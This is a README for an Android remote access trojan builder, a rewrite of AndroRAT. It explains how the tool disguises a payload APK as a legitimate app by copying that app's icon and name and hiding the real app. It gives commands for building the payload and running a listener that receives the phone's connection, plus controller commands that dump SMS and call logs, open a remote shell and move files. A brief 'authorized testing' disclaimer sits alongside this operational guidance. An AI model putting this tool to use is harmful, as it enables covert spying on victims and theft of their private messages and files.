A modern rewrite of AndroRAT by karma9874, rebuilt from scratch to actually work on modern Android (tested up to Android 17). The original project stopped functioning reliably on newer Android releases due to major permission and API changes. Tested with Galaxy S25 Ultra.
It is not an exact clone of the original. METAvas is designed for situations where the user intentionally installs and uses the payload APK on their own device or within an authorized testing environment.
What happens step by step
- Decodes the target APK using apktool
- Extracts the app name, icon, package name, and main activity from the manifest
- Removes the LAUNCHER intent category from the target app so it no longer appears on the home screen after installation
- Rebuilds and signs the modified target
- Copies the base payload smali, injects your IP/port, and patches it to launch the real app when opened
- Replaces the payload icon and label with the ones extracted from the target app
- Builds and signs the final payload as out/metavas_launcher.apk
For authorized security research and penetration testing on devices you own or have written permission to test. Don't be stupid with this.
- Linux (tested on Ubuntu/Arch Linux and other linux distros)
- Java 11+
aapt2(from Android build tools)- Python 3.8+ (for the controller)
bash metavas.sh -i <YOUR_IP> -p <PORT> -t <path/to/target.apk>Example:
bash metavas.sh -i 192.168.1.10 -p 4444 -t ~/Downloads/someapp.apkYou end up with two APKs in out/:
| File | What it is |
|---|---|
<pkg>_hidden.apk |
The real app, with its launcher icon removed |
metavas_launcher.apk |
The payload, wearing the real app's identity |
Install both on the device. The payload opens, silently launches the hidden real app, and calls back to your listener.
Usage
pip install -r requirements.txt
python3 control.py -i <YOUR_IP> -p <PORT>Start the listener before or after the device connects — it will wait.
python3 control.py -i 0.0.0.0 -p 4444Bind to a specific interface instead of all:
python3 control.py -i 192.168.1.10 -p 4444Once the device connects you get a prompt:
METAVERSE:/>
| Command | What it does |
|---|---|
deviceInfo |
Basic device info (model, Android version, etc.) |
getSMS inbox |
Dumps inbox SMS to a timestamped file in Dumps/ |
getSMS sent |
Same for sent messages |
getCallLogs |
Dumps call history to Dumps/ |
getIP |
Returns the device's IP address |
shell |
Drops into an interactive shell on the device |
help |
Shows the command list |
clear |
Clears your terminal |
exit |
Closes the connection |
Inside shell you get a proper interactive prompt (android@shell:~$). You can also push and pull files:
android@shell:~$ pull /sdcard/somefile.txt # downloads to Dumps/
android@shell:~$ push localfile.txt # uploads to /sdcard/temp/
All dumped files go into a Dumps/ folder in the directory you ran control.py from, named by type and timestamp.
This project is licensed under the terms of the GNU General Public License v3.0. External dependencies might be distributed under a different license, such as:
- apktool, licensed under the Apache License 2.0
- platform_build (signapk), licensed under the Apache License 2.0
- Original Payload APK — karma9874
- METAvas and initial ideas — Sameer Al Sahab
